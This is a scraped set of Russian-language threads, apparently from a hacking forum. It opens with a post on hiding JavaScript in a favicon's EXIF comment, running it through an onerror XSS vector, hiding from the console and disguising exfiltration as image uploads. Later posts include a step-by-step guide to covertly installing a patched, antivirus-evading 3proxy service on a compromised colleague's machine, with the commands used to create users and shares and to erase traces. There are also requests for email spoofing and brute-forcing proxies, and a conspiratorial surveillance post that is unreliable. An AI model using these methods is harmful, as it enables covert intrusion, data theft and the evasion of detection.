Хорошо, консоль заставили саму себя выпиливать - прекрасно (назовём эту ситуацию: охранник чистил дуло заведённого дробовика и решил пронаблюдать выстрел глядя прямо в дуло) теперь пришла пора понять как незаметно получить любой код и выполнить его, причем так, чтобы в консоли браузера это было максимально не заметно, или, если браузер разрешит так, чтобы этот код нельзя было поймать в запросах и при чтении исходных кодов.
И не долго думая в голове назрел список форматов, которые в консоли браузера не читаются как текстовый код: это медиа-файлы, и некоторые специфические файлы (отпадают в силу отсутствия поддержки везде и всегда).
Остаются лишь медиа-файлы, но, вопрос стоит в том - как сделать из настоящего медиафайла, причем желательно уже присутствующего на конечной цели. Вариантов несколько, но выбор пал на favicon.ico как самый популярный файл в интернете, к тому-же медиа.
Теперь как же заставить эту картинку хранить динамический код и посредством чистого JS - код вытянуть и выполнить? Спустя 2 сутки раздумий меня осенило: вспомнилась Windows XP и те времена, когда приходилось заходить во вкладку "Подробно" чтобы поменять ошибочное название песни, которое раздражает потом глаз на дисплее плеера.

Примерно поставив цель вместительности поля в минимум несколько тысячь символов недолгим брутфорсом оказалось что единственное идеально подходящее поле под названием "Комментарии".
Хорошо, код сохраняется, берём теперь настоящую иконку favicon.ico и осознаем, что можно просто отконвертировать её в jpeg (столкнувшись с проблемой минимального размера 32х32 задумаетесь над увеличением картинки до обработки), внести EXIF-тег с кодом и дальше дело за малым: надо эту картинку подгрузить в обход политики CORS (решается путём no-cors и на стороне клиента (JS формовка запросов) и на стороне приёма (PHP клиент с rewrite_mod трюками)

---level evalFROMimg = > poking around paths ---

В принципе, решение для чтения EXIF из картинки легко вытащить из гугла. Я лично отталкивался от данного скрипта и сразу же столкнулся с проблемой, что картинка с иного домена буквально отказывалась расчленяться функцией. Браузер требовал, чтобы картинка была внутренняя для того домена, где мы пытаемся сделать разбор и решение было крайне простым: просто вывести картинку в DOM дерево, таким образом решив проблему с политикой безопасности.

---level evalFROMimg = ISevalPOSSIBLE? ---

Успешно разобравшись с получением кода из cross-domain картинки внезапно оказалось что код наотрез отказывается выполняться любым способом по причине того, что браузер против исполнения кода который до этого принадлежал картинке.
3 сутки я полагал, что задача нерешаема и я потратил 2 недели мыслей об этом зря, но меня осенило вновь: а может поиграться с выводом в DOM дерево?

Играясь с сотнями вариантов полей, проведя несколько дней в гугле я наконец-то наткнулся на [эту статью](https://owasp.org/www-community/xss-filter-evasion- cheatsheet#Image_XSS_using_the_JavaScript_directive). И перепробовав все указанные методы обнаружился один, работающий везде и без запинок. И это выполнение кода помещенного в атрибут onerror="". Тщательно поигравшись с экранизацией символов, получился конечный код, который Вы наблюдаете в статье malwarebytes.

---level evalFROMimg = Secure Politics? Unsecure greetings ---

Итого вышло, что браузер конечно имеет политику безопасности, только такое впечатление, что "политика безопасности" ограничена другой "политикой неприкасаемых и малоизвестных функций", которые буквально стали исключением для всех 3х механизмов противостояния такого явно плохого поведения JS: code execution from cross-domain media-files

Вывод: политика безопасности скорее костыль - чем закон в браузере, и всемогущий JS это всегда рад справится с внутренними тараканами костыльных разрабов, что под "политикой безопасности" подразумевают частичное ограничение самых популярных функций (напоминаю, для текущей задачи все буквально складывается как на мази: хотел картинку изначально - и без особых усилий браузер позволил мне это реализовать. Ладно бы если пришлось перепробовать пару тройку видов медиафайлов, но черт возьми: браузер забывает что код взялся из картинки, как только появляется не прописанное исключение "onerror" и примерно еще 3 варианта, которые я тестил только в Хроме (но с большой долей вероятности работающие и в других браузерах).

---level sendingData = still image ---
Сбор данных до изнеможения простой, там буквально не о чем рассказывать. ну и по скольку вся работа до этого момента вертелась вокруг картинки, мне стало чертовски желанно отправлять данные в виде той-же картинки, и это стало буквально завершающим штрихом

![](/proxy.php?image=https%3A%2F%2Fblog.malwarebytes.com%2Fwp- content%2Fuploads%2F2020%2F06%2FJS_POST.png&hash=225d3e2ef116ec5d83d01944e9f942a5)

Данный код упаковывает blob как картинку, и дальше простая отправка данных которая в консоли будет смахивать на запрос "image binary data".

Исходя из реакции на эту статью я буду её дополнять по возникшим вопросам у пользователей, потому продолжение с развёрнутыми ответами на ваши вопросы, а так-же развёрнутые примеры с разбором кода будут в случае востребованности.

Цель статьи показать: насколько легко имея опыт и Google - писать скрипты, потенциально работающие в пределах политики безопасности браузера, заставляя браузер тем самым и быть "вредоносным ПО", по скольку всю работу (по приему, хранению и передаче данных, с трюками мешающими исследовать поведение кода в консоли) он выполняет на чистом JS, без библиотек типа jQuery и что самое главное: на любых OS и любых современных браузерах.
К тому-же, время от времени меня посещали идеи, которые (и каждый раз меня это удивляло будто впервые) работали и работают. Значит материал еще как минимум на 3 таких статьи, где с каждым разом вам будет открываться одна великая тайна: браузер - это абсолютно не способная к самоконтролю система, поддающаяся "обходу" методом тыка и не имеющая спустя десяток лет развития ЭЛЕМЕНТАРНЫХ способов ограничения влияния JS на первичный HTML.

Когда ожидать решения всего указанного? Не раньше глобального обновления движка и стандартов. Костыли лишь сломают сайты, которые используют указанные функции в мирных целях.
Почему столько компаний и лет разработки оставили нас на едине с желанием обезопасить свои данные? Вероятно потому, что Аналитика от Google, Яндекс и остальные мелочные примеры трекеров - напрямую зависимы от этих "дырочек" позволяющих им делать своё дело.
Ведь главное то, что большую часть подсказок и решений и подчеркнул именно пролистывая исходник аналитики, раз за разом мне открывались буквально те решения, против которых и был сделан скрипт Mr.Sniffa, как объединяющий все в одну кучу.
Что делать на данный момент? Смирится с тем фактом, что компании разработавшие браузеры искренне пытались завуалировать сбор и передачу данных. И худший пример абсолютно беспардонной, буквально ВИРУСНОЙ и бесконтрольной передачи данных на серверы Яндекса посредством самого злостного стиллера юзер- принтов, истории и даже куки - Яндекс.Браузер. Попробуйте проснифать процесс браузера так, чтобы браузер не знал что включен снифер запросов
Неужели всё так плохо? учитывая то, что код в пару строк способен обойти все механизмы защиты во всех браузерах на всех ОСях - да, факт фактом, но всё действительно плохо. и подобными трюками пользуются все социальные сети мечтающие показать тебе рекламу по теме твоего последнего запроса в google.
А что насчёт анонимных браузеров? По скольку они работают на той же базовой логике, и вместо борьбы с причиной - борются с следствием, то очевидно что они всего лишь пытаются препятствовать тому, под что браузер заделан. Бессмысленное препятствие на самом деле. Даю подсказку где искать больше всего чудесного кода: Facebook, Google, Яндекс. Если Вы еще ни разу не удосужились пролистать их скриптинг тщательно его почистив и декодировав - то самое время. Так-то, материала для разбора кода там еще на одну большую статью, и я даже не знаю есть ли смысл писать на форуме, где выводы делают раньше чем получат полноценную информацию?) Если оцените - напишу еще пару итоговых статей, так сказать, подарю идеи, которым не суждено было быть реализованным мною, за то другим программистам в радость)
А может быть хуже?
Конечно, на самом деле статья - лишь верхушка айсберга, и спускаться под лёд или нет - ваше дело, но как насчёт того, чтобы все созданные объекты, сразу же после выполнения удалять через parentNode.removeChild например. Или, вместо того чтобы в коде явно был указан домен куда идут запросы - высвечивался фейковый домен, который с помощью массива перестановок символов будет формировать конечный домен для запросов, решая проблему с поиском зловреда через поиск по ключевым словам и рекурсивного декодера зашифрованных строк. (про отладку в консоли можно забыть, ведь сверху не пробиваемая защита от консоли)
И все-же намекну еще раз: я рассказал лишь об одном из полученных "методом тыка" путей сокрытия подобной активности. Если политика безопасности не будет распространена на все составные части движков, а стандарты зависящие друг от друга не станут наконец-таки взаимо-ограничивающими для гарантии отсутствия утечек данных даже с реализованной XSS - то, этот интернет захлебнётся в слитых базах паролей и единственные пароли, что нельзя будет де факто сбрутить, станут md5 хеши тех самых паролей. Хотя секундочку... вспомнил про радужные таблицы на видеокартах и понял, что даже это не поможет.

Как защищаться от кражи данных с сайта?
Я советую использовать глобальные фильтры на приём данных, которые будут перерабатывать и обезвреживать всю поступающую на всех уровнях переменных информацию. Для каждого дела должно быть свое решение, но как завершающий этап статьи, приведу маленький не полноценный пример что покрывает 90% потребностей в фильтрации данных:

PHP:Copy to clipboard

function xss_cleaner($input_str) {
$return_str = str_replace( array('<','>',"'",'"'), array(htmlspecialchars('<'),htmlspecialchars('>'),htmlspecialchars("'"),htmlspecialchars('"')), $input_str );
$return_str = str_ireplace( '%3Cscript', '', $return_str );
return $return_str;
}

function filter($data) { //Filters data against security risks.
$data = trim(htmlentities(strip_tags($data)));
if(get_magic_quotes_gpc()) $data = stripslashes($data);
// $data = mysql_real_escape_string($data);
return $data;
}

foreach($_GET as $key => $value)  { $_GET[$key] = xss_cleaner(filter($value)); }
foreach($_POST as $key => $value) { $_POST[$key] = xss_cleaner(filter($value)); }

Вы должны понять, что бороться с следствием (внедрённым в базу кодом) бессмысленно. Фаерволлы и т.д. и т.п. на языке аналогий всего лишь по сигнатурам пытаются отсеять трафик, который не обязательно нуждается в отсеве (гибкость системы в 2к20 подавай повсеместно и без компромиссов, антивирусы как Вы поняли способны реагировать с диким замедлением в пол года и они не способны справится с рандомизацией кода, по скольку сигнатуры на каркасе из функций будут затрагивать множество других не вредных скриптов по всему интернету). И бороться с причиной в нашем случае значит - отрезать возможность принятия данных, способных нанести ущерб. Ситуации обычно касаются XSS и SQL, и буквально перелистав все вариации применения обоих типов баг - легко обнаружить то, что нуждается в фильтрации.

Код должен допиливатся Вами под локальные потребности отдельно взятого проекта, но рекомендую обратить внимание не необходимость отработки переменных $_COOKIE, $_SERVER как минимум, а так-же расширения возможностей функций по преобразованию спец.символов в их HTML коды. Побочные эффекты проверяйте сразу с полным набором возможных данных на вход (как и простые данные и то, как они в конце концов выглядят по итогу, так и успешное избежание XSS, SQL)

Примерно таким образом владельцы магазинов (и разработчики движков на которых оные работают - могли бы раз и навсегда решить проблему с входящими данными), но очевидно вместо кастомизации данного решения и возможности с ним работать для тех кому это надо, и отключить для тех, у кого данные не могут проходить сквозь призму фильтрации (к примеру на не дефолтных кодировках, разных алфавитах).

Возможно после этой статьи и разработчики движков, и разработчики браузеров наконец-таки повысят свой уровень, и тогда придёт время для другой статьи. Т.е. ровно в тот день когда все основные браузеры исправят указанные в статье бреши - я опубликую новую тему, с гораздо более тонкими структурными вопросами, чуть меньшим кросс-браузером, но, когда под каждый браузер пишется свое решение - здесь есть своя доля романтики. Особенно если одно другому рознь и костыль

P.S. Статья написана на одном дыхании и без особого старания, по скольку общество на данном форуме вполне вероятно даже и не оценит сей труд. А уж подробно стараться не зная реакции - и вовсе не хотелось. Жду ваших вопросов, и имейте в виду: статья написана в ознакомительных, образовательных целях, и несёт за собой лишь акцент внимания на природе "вредоносного ПО намеренно позволяющего похищать данные" в лице браузеров. По поводу передачи данных типичными браузерами ни для кого не новость, но как насчёт всеми любимых TOR, Sphere?) Я мельком чекал их, и если сфера хотя-бы пытается притворится хорошим браузером (но по факту браузер упускает новомодные заголовки по которым гугл идентифицирует людей. Хотя может и пофиксили. Не в курсе, но, кому интересно - поглядите) Напоминаю: процесс монитора пакетов надо скрыть, чтобы браузер его не видел, ибо они, и это лол, очевидно не делают ничего "плохого" если присутствует открытый процесс отдаленно похожий на снифер пакетов. В общем-то, браузер пытается обмануть ОСь, JS пытается обмануть браузер, а я осознаю и понимаю, что эта ситуация (на примере браузеров, хотя подобные статьи я могу написать практически по любому ПО которое исследовал) продлится еще минимум столько же, а то и гораздо больше.
Так-же передачу данных не стоит ждать на свежих установках браузера и ОСи. Казалось бы, можно же снять галочку про отправку данных? Только эта галочка не влияет на передачу твоих принтов. Не веришь? Убедись сам.

P.S. Самым желанным моим опытом как программиста уходящего на пенсию в трейдинг - была бы возможность денёк другой обсудить с разработчиками стандартов то, чем они озабочены. Если добавлять еще больше не обрабатываемых с должной степенью разграничения доступов функций - это все что они могут выпуская новый стандарт, то им самое место в тюрьме собственной ущербности и беспомощности, как потенциальных вредителей наражающих пользователей на неосознанную опасность. Процесс получения конечного результата был слишком простым, даже в сравнении с реверсингом обновлений лицензеров у всяких Adobe.

P.S.2 Данная статья по сути подчеркивает те проблемы, о которых написана 1001 другая статья на все те же темы, но сделано это на примере выработки решения под определенную задачу с 0.
Хорошим примером статьи по теме но без примеров пожалуй будет [эта](https://heimdalsecurity.com/blog/traffic-filtering-secure-your-pc-cyber- threats/). Я бы сделал ставку, что фикс 4х основных браузеров включая мобильные версии и учитывая сложность и проблематику решения займёт минимум год, при условии что разрабы начали работу над новым стандартом прямо сейчас. Сколько времени у них займет жесткая переработка приоритетов в политике безопасности - хз, но по моим представлениям работы там куда больше и побочных багов будет очень много, просто потому что им придется буквально переделать свою матрёшку на новый-старый лад (читайте первичные спецификации симбиоза HTML/JS для понимания сути)

Spoiler: P.S.3

Ближе к тому моменту когда Вы дочитаете 3-ю статью по браузерам, если она конечно будет актуальна и выпущена у вас тоже поднимется ЧСВ, от того, что мысли станут ценными, а опыт богаче моё чсв соответствует той ценности инфы что я обладаю, но, об этом вы могли бы знать только увидев мой профиль на linkld, github и ряде других сообществ где публикую свои белые разработки под другим именем. Единственное место где мой формат публикаций не оценили - это хабр, но, они не сильно любят художественный уклон при написании статей. И ЧСВ без репутации на хабре тоже. (ну что, деанонщики, найдёте самое ценное что у меня есть? Дам 3 подсказки: профиль на linkld с января 2013 года, на нём 116 позитива, 0 негатива, и всего лишь 1 строка из описания которую можно было встретить в моем личном телеграме. Перебрав все профили там такой лишь один, только что проверил)

Что лишнее или что добавить в firefox для приватности?

ID: 676533bbb4103b69df371cc6
Thread ID: 37962
Created: 2020-05-31T21:43:28+0000
Last Post: 2020-06-28T19:04:32+0000
Author: EeXau1ei
Replies: 11 Views: 3K

adblock, canvas defender, disable webrtc, https everywhere, noscript, user agent, privacy badger

Анонимный mailer

ID: 676533bbb4103b69df371de2
Thread ID: 12338
Created: 2006-10-06T13:29:37+0000
Last Post: 2006-11-08T12:36:04+0000
Author: @$_terr_X
Replies: 7 Views: 3K

я например...знаю вот этот(позже будет доработан, чтоб отправлять файлы), и этот!

кто ещё какие способы знает...чтоб анонимно отправлять почту?!

Проблема с анонимностью

ID: 676533bbb4103b69df371dea
Thread ID: 12382
Created: 2006-10-07T07:02:33+0000
Last Post: 2006-10-08T07:46:52+0000
Author: NightmareX
Replies: 6 Views: 3K

Собсно в чем проблема. Был адсл - все было гуд. Брут работал, ИП скрывать мог. Теперь кабельный инет - брут не пашет, ИП не могу скрыть ни в ручную, ни посредством различного софта (Hide IP....). В чем беда?

Надежный анонимность

ID: 676533bbb4103b69df371deb
Thread ID: 12208
Created: 2006-09-30T19:18:16+0000
Last Post: 2006-10-03T10:14:27+0000
Author: b1t
Replies: 5 Views: 3K

Здарова мужики.

Уменя такая проблема: Хочу зайти через прокси, но уменя УЖЕ стоит прокси (на IE уменя стоит прокси 127.0.0.1, т.к. уменя спутниковый инет, и уменя переделована ЗАМЫКАНИЕ НА СЕБЯ, чтоб скачать из спутника, а не из GPRS-a). Я поставил Steganos Internet Anonym Pro 2006 8.0 и уменя начался зависать музыка, торможить курсор в текстовых редакторах + того и не скрывает IP... :bang: , потом поставил FreeCap , и там настроил так, вроде цепочка, первым поставил мой IP(127.0.0.1) а потом (второй) брал рабочий анонимный Http прокси, и поставил.. опять..НЕ СКРЫВАЕТ...
Что делать? а так уменя статический IP адрес..
Посаветуйте пожалуйста какой нить "инструмент".. :sorry:

P.S. Hide IP Platinum не предлогать, т.к. там где этот прога заполняет прокси, там уменя уже стоит мой внешний..

Очень странная проблема VPN

ID: 676533bbb4103b69df371ded
Thread ID: 12179
Created: 2006-09-29T16:26:24+0000
Last Post: 2006-09-30T20:25:38+0000
Author: GELLL
Replies: 8 Views: 3K

Я пользуюсь для доступа в сеть VPN соединение, это условие провайдера предоставляющего мне эту услугу. Но вот проблема чтобы я не ставил, тот же Hide IP или Соксчейн мой IP палиться, н могу разобраться, может кто подскажет. Буду весьма, примного, благодарен.

Отправка почты от чужого мыла?

ID: 676533bbb4103b69df371def
Thread ID: 11373
Created: 2006-09-04T12:37:15+0000
Last Post: 2006-09-04T13:41:00+0000
Author: SQL
Replies: 2 Views: 3K

Есть у кого скрипт для анонимной отправки почты от чужого адреса?Иль сервис где таковой имеетя? :bang:

3proxy на взломанной машине

ID: 676533bbb4103b69df371df2
Thread ID: 11248
Created: 2006-08-31T19:02:40+0000
Last Post: 2006-09-01T14:25:32+0000
Author: Triplex
Replies: 6 Views: 3K

Итак, имеется взломанная в локальной сети машина, доступ с помощью radmin'a.
Подскажите пожалуйста, как удаленно установить 3proxy, чтобы заюзать халявный инет, и естественно чтобы не с палиться.

Вот нашел мануал как это сделать, но я не знаю как его с компилить.

Пособие для захвата чужого трафика С улыбкой.

Ситуацию, в которую я попал и для чего я это делал, была описана в самом начале. Естественно вся конфигурация сети и названия портов были изменены (на всякий случай).
Для тех, кто решит повторить все, что здесь написано: все действия сначала проводите на проверенной удаленной машине, что бы «обкатать» все действия и не запалить себя.

Что у меня было? Был удаленный шелл на машине начальника (как я его получил, это вопрос не по теме). Была сконфигурирована на виртуальной машине операционка похожая на удаленную, на которой я проводил свои испытания.
Что мне нужно было? Мне нужно было удаленно поставить какой нибудь прокси и у себя в браузере прописать этот прокси и нужный порт.

Распишу по этапам, как я действовал:

нужно было выбрать прокси
замаскировать прокси
настроить прокси
удаленно залить прокси на «другую» машину (далее по тексту, я так буду называть компьютер начальника)
удаленно запустить прокси (желательно как сервис)
подчистить следы
настроить свой браузер
Здорово все, ёоу С улыбкой

Теперь подробнее о каждом действии:

Сначала я по инерции выбрал то, что лежало на моей машине, а именно – Proxomitron. Его свойства – удобный графический интерфейс (в данном случае это было недостатком), блокировка банеров и много всяких других наворотов. Если его запускать из шелла, то он не работает, и к тому же появляется в списке задач, что не есть гуд.
После небольших поисков по инету я наткнулся на ES Proxy. Поначалу я не понял, как программа работает, потому, что если ее запускать просто так из командной строки, то она ничего не выдает. С сайта изготовителя я нашел инструкции по настройке и установке программы. Сразу скажу, что у нее много достоинств (читайте на сайте изготовителя), но и есть недостатки, по котором мне пришлось отказаться от нее. Первый и самый важный недостаток – она отказалась работать на другой машине, хотя в моем эмуляторе все работало нормально и она перенаправляла трафик. С чем это было связано, я так и не мог выяснить, хотя настраивал ее по минимуму, то есть все разрешал и ничего не запрещал. Естественно мне нужна была стабильность, а ее не было. Второй минус программы, это то, что при инсталляции ее, как сервиса, она сама себя устанавливает в каталог винды, причем под своим нормальным именем и создает несколько длинных файлов (я так понимаю временных), которые очень сильно выделяются из общей массы. Вот, например:
esps4_save_routers_data.dat
esps4_save_server_params.dat
Хоть в этих файлах ничего нет, но все равно любой мала-мальский пользователь увидев их, сразу найдет и прокси и его настройки, в которых указаны разрешенные адреса, а это значит, что могут запалить.
После небольших обсуждений в этом форуме мне любезно предложили использовать программу 3Proxy. Сразу скажу, что программ эта примерно такого же уровня, что и ES Proxy, но у нее есть ряд достоинств, которые мне понравились:
- ее можно переименовать и устанавливать в переименованном виде.
- запускается с файлом настроек, который мы сами указываем и делаем.
- есть исходные коды (которые мне пригодились).
Из недостатков хочу отметить, ее длинное имя в списке сервисов (хотя мне кажется, это можно поправить) и что при установке ее сервисом, она выдает окно с вопросом «установить меня (да/нет)». Конечно при легальной установке, это безразлично, но при удаленной установке это недопустимо, хотя я обошел это препятствие (читайте дальше).

На этом этапе я остановил свой выбор на последней программе 3Proxy.

Что бы программа не определялась никаким антивирусом, ее нужно замаскировать. Перед тем, как маскировать программу, мне нужно было убрать сообщение «установить меня (да/нет)» в исходном коде программы и скомпилировать.
Скачав исходники, я начал их изучение. После 3 минут беглого просмотра текста в файле 3proxy.c я увидел следующие строки:

if((argc == 2 || argc == 3)&& !strcmp((char *)argv[1], "--install")) {
sprintf((char *)tmpbuf, "%s will be installed and started.n"
"By clicking Yes you confirm you read and accepted License greement.n"
"You can use Administration/Services to control %s service.",
stringtable[1], stringtable[2]);
if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;
*tmpbuf = '"';
…………}

Для тех, кто плохо разбирается в языке «С» поясню:
В первой строке проверяется наличие параметров в командной строке и сравнение их с шаблоном, то есть, что бы установить программу как сервис, нужно написать:

3proxy.exe --install 3proxy.cfg

Нетрудно видеть, что если программа устанавливается как сервис, то первый аргумент должен быть –install. Если это условие выполняется, то мы выполняем все что находится между {}.
Смотрим вторую строчку, и что мы видим? А видим мы формирование надписи, которое выскакивает при установке программы, как сервиса. Теперь смотрим на третью строку и видим команду создания того самого окна с надписью, которая была сделана во второй строке. Теперь поясню, что она делает.
В этой строке происходит проверка, какая была нажата клавиша в окне с запросом и если не была нажата клавиша YES (да), то программа просто заканчивается (return 1). Что бы не выводить этого, можно просто заремировать данную строку и программа и программа просто установит себя как сервис без всяких запросов. После правки кода, данная строка должна выглядеть так:

//if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;

Теперь нужно скомпилировать программу. Как это делается. Для начала, нужно, что бы был компилятор, я использовал Visual C++ 6.0. Для него набираем команду:

nmake /f Makefile.msvc.

После этого нужно подождать около минуты, пока файлы скомпилируются и соберутся. Сразу скажу, у меня компилятор сначала не хотел работать, из за того, что я его криво когда-то установил. То есть пути к нему не были прописаны, и пришлось все собирать вручную. Пыхтел я больше часа, потом плюнул и установил в виртуальной машине с нуля Visual C++ 6.0 и скомпилировал там за одну минуту.
После компиляции в каталоге с исходниками создаются exe файлы. Берем оттуда 3Proxy.exe и переименовываем его в что нибудь незаметное, например servicess.exe. Проверяем его антивирусом и что мы видим, KAV ругается, а DR.Web нет. ладно, есть много способов обмануть антивирус. Первое упаковываем его программным архиватором, который не понимает антивирус (типа PE Compact или что нибудь экзотическое). Второе можно подменить заголовки упаковщиков и третье, дизассемблировать программу и исправить точку входа. Последним пунктом я не разу не пользовался (не приходилось, хотя пару статей про то, как это сделать, где то есть на компе). Я применил первый вариант, его хватило, что бы KAV вообще не замечал этой программы.

Для того, что бы прокси работал, нужно создать файл настроек. Самый простой файл будет иметь всего три строки:

auth none
log
proxy

поясняю, первой строкой мы авторизируем всех, второй строкой выводим лог на экран, третьей заставляем работать прокси на стандартном порту 3128. Так, теперь мы открываем блокнот и пишем там свой файл, который нужен нам:

service
auth none
allow *
proxy –p3050

поясняю, первой строкой мы говорим, что прокси работает сервисом, второй, что нам не нужна авторизация, третьей и четвертой мы говорим, что прокси нужно работать на 3050 порту. Все сохраняем файл в servicess.сfg
теперь у нас два файла, которые будут нужны на удаленной машине:

servicess.exe
servicess.cfg

Заливаем прокси на другую машину. Сразу скажу, что мне это труда не составило, так как весь отдел имеет внутренние папки для обмена информацией. То есть на каждой машине создается папка «общая» и разшаривается для всех. Я просто скопировал два файла в эту папку и в шелле набрал следущее:

cd\
cd c:\общая
move servicess.exe c:\windowssystem32\servicess.exe
move servicess.cfg c:\windowssystem32\servicess.cfg

Поясняю, первой строкой я перешел в корень на диск С. Второй строкой я перешел в папку «общая». Третьей и четвертой строкой я переместил файлы в каталог c:\windows\system32\

Для тех, кто не имеет доступа к машине, есть два способа залить файлы:
- создать пользователя и расшарить папку.
- через ftp залить программы
сразу скажу, что вторым способом я пользуюсь редко, обычно первый проходит без проблем.
Рассмотрим первый способ:
Для начала создаем пользователя на удаленной машине, через шелл:

Net user add 123 /add

Мы создали пользователя add с паролем 123
Теперь набираем команды:

cd\
dir /ad

первую команду я описывал, а вторая показывает список каталогов
выбираем из этого списка самый неприметный каталог и расшариваем его командой (для примера я выбрал каталог C:\musik)

net share musik=c:\musik

внимание, не берите общесистемные каталоги, они могут быть уже расшариные и тогда команда net share вернет ошибку.
После всех манипуляций, если мы не знаем имя компьютера, который ломаем, то набираем ipconfig, для того, что бы посмотреть IP адрес жертвы (допустим он такой 10.3.1.1).
Теперь заходим на удаленный компьютер. У себя набираем

\\10.3.1.1\music

И поле запроса логина и пароля вбиваем add и 123. после этого заливаем в эту папку два наших файла и переносим их куда нибудь в незаметное место, типа c:\windows\system32\ командами с шела:

cd\
cd c:\music
move servicess.exe c:\windows\system32\servicess.exe
move servicess.cfg c:\windows\system32\servicess.cfg

Удаленно запускаем прокси, как сервис:

cd\
cd c:\windows\system32
servicess.exe --install servicess.cfg

если все нормально, то программа ничего не выдаст, а сканер покажет, что на удаленной машине открылся порт 3050.

Подчищаем следы. Если вы создавали пользователи и расшаривали папку, то нужно все вернуть на место, а именно в шелле нужно набрать:

net user add /delete
net share musik /delete

Настраиваем свой браузер. Заходим в настроки, там в прокси и прописывам адрес прокси 10.3.1.1 и порт 3050.

Кто сможет сделать proxy без этого окна, с запросом при установке как сервиса,
пожалуйста выложите его сюда!

Прокси для брута

ID: 676533bbb4103b69df371df3
Thread ID: 11074
Created: 2006-08-29T16:43:41+0000
Last Post: 2006-08-30T13:22:08+0000
Author: Димыч
Replies: 5 Views: 3K

Народ скажите плизз где достать прокси для брута.

Не меняеться ip

ID: 676533bbb4103b69df371df5
Thread ID: 10397
Created: 2006-08-09T12:46:34+0000
Last Post: 2006-08-09T12:56:33+0000
Author: Anarhy
Replies: 2 Views: 3K

Рассказываю ситуацию.Раньше пользовался SPOILER ip и все работало,ip менялся..но недавно посмотрел и увидел,что программа не работает.т.е ип остаеться прежним.Скачивал разные версии программы-ниче не меняеться.
Вот с вашего раздела Софта скачал Surf Anonymous...все сделал как в видео сделано,но так же..как было так и осталось.Может кто знает в чем проблема?
Я хоть и не дурак,но понять не могу почему не меняеться..

Socks & cmd

ID: 676533bbb4103b69df371df7
Thread ID: 10082
Created: 2006-07-24T14:01:08+0000
Last Post: 2006-07-25T15:55:32+0000
Author: Dark_Stone
Replies: 4 Views: 3K

Для скрытия йп, во время работы експлоита, запускаю cmd через Sockscap. Но после завершения работы сплоита окно закрывается, такого нет при прямом подключении, без прокси.
Зы. Пробовал freecap, cmd.exe закрывается сразу, после запуска.
Подскажите как решить проблему или посоветуйте другой способ запуска сплоита через проксю :help: :pioneer:

Работающие прокси

ID: 676533bbb4103b69df371e0a
Thread ID: 7474
Created: 2006-03-19T10:16:18+0000
Last Post: 2006-03-19T10:39:52+0000
Author: dSnaKe
Replies: 1 Views: 2K

Тут Постоянно обновляются раз в нескольно часов. Все точно работает

Статья по безопасности

ID: 676533bbb4103b69df371d7f
Thread ID: 27261
Created: 2019-01-12T08:26:21+0000
Last Post: 2019-01-12T08:42:34+0000
Author: Fogg
Replies: 1 Views: 2K

![](/proxy.php?image=http%3A%2F%2Fwww.parlam.kz%2Fimages%2Ffs%2Fb9ca936f-6311-4202-89cc- cccbe882a283.jpg&hash=61318739ef874e7f9ba5858a84143cdc)
Данная тема будет полезна всем кто занимается какой либо деятельностю в сети и так, кто за нами следит?

Провайдеры
имеют доступ ко всем регистрационным данным и сдают по запросу правоохранительным органам.

Трояны
?сбор ваших данных, просьба оплаты смс, превращение ip в прокси, подставляют вас на кражах, продают ваши данные.

Полиморфные вирусы
опасность в том что их не обнаружат, используются такими организациями как COPM и Эшелон, проникают к вам и записывают все ваши действия, пароли и т.д. Если данная организации обратили на вас внимания, то избежать заражения нельзя.

Руткиты
Используются также спец. службами, это процесс который прячет от вас трояны, антивирусами не обнаружить.
Отдел К – состоит на страже государства, не мало хакеров, кардеров и других кибер преступников попалось в их лапы. Во многих случаях обращаются к помощи COPM за данными преступника. Им остаются только придти к вам домой.
В сети существует множество ресурсов, на которых заостряет внимания спец. службы. К таким ресурсам чаще всего относятся не чистые сервисы, форумы и т.д. COPM осуществляет мониторинг за такими ресурсами и получает все данные пользователей данных ресурсов.
Что за COPM и как он работает?
Это спец. аппаратура, её основные компоненты!
АППАРАТНО-ПРОГРАММНАЯ ЧАСТЬ (УСТАНАВЛИВАЕТСЯ У ОПЕРАТОРА СВЯЗИ);
УДАЛЕННЫЙ ПУНКТ УПРАВЛЕНИЯ (УСТАНАВЛИВАЕТСЯ У ПРАВООХРАНИТЕЛЬНЫХ ОРГАНОВ);
КАНАЛ(Ы) ПЕРЕДАЧИ ДАННЫХ (ОБЕСПЕЧИВАЕТСЯ ПРОВАЙДЕРОМ ДЛЯ УСТАНОВКИ СВЯЗИ С ПУНКТОМ УДАЛЕННОГО УПРАВЛЕНИЯ).
Взять например провайдера, у него устанавливается спец. устройство, которое перехватывает весь трафик и направляет COPM, а оборудование провайдера подключается к COPM, таким образом весь трафик может быть в любой момент перехвачен правоохранительными органами.
COPM может передать вашу информацию в режиме статической и полной.
Есть COPM-1 который следит за аналоговой связью, телефонными переговорами.
COPM-2 создан для прослушки сотовой связи и контроля интернета.
COPM-3 о нём не могу сказать многое, это новый, секретный вариант который был создан из за проблемы того, что многие стали использовать VPN и другие меры безопасности. Он обеспечивает контроль над множеством vpn серверов, по средством его ФСБ с этого года будет прослушивать скайп, аську и т.д.
Основная его цель объединить все направления COPM в мировую базу данных которая будет взаимосвязана между собой и глобально контролировать трафик в нашей стране и других странах где есть система COPM.
COPM стоит везде, это провайдеры, дата центры, всем любимые соц. сети, программы на подобие icq и скайп, они внедряют туда свои закладки что бы иметь возможность прослушивать, советую не использовать обновлённые версии qip, Icq и skype. Все эти программы не работали бы, если бы в них не были заложены закладки, попросту не разрешили деятельность.
Заходя в сеть, вы сразу попадаете под наблюдение COPM-2 за счёт своего провайдера, все ресурсы которые вы посещаете, все ваши регистрации и т.д. есть у провайдера, который хранит логи 3 года, а по не официальной согласованности с COPM 10 лет. Это одно из условий COPM-2, без этого провайдер не получит лицензию на оказание услуг.
СОРМ 2 стоит на всех поисковиках, все ваши запросы на прямую передаются в COPM, а также соберает все ваши настройки по кукам, по вашим запросам и паролям составляется картина пользователя. Например при вводе вашего пароля оператором COPM, в программе высвечиваются всё, куда либо вы вводили, т.к. COPM внедрена практически везде.
Взять например web money, она полностью сканирует ваш ПК и прописывается в реестре, привязывается к вашему маку и серийному номеру оборудования и к данным которые вы оставили при регистрации, всё это делает web money но сведения автоматически отправляются в COPM, также это относится к почтовым ящикам, соц. сетям, различным сервисам и т.д. Все ваши данные попадают в единую базу по которым легко составить аналогию и выяснить кто стоит за тем или иным деянием.
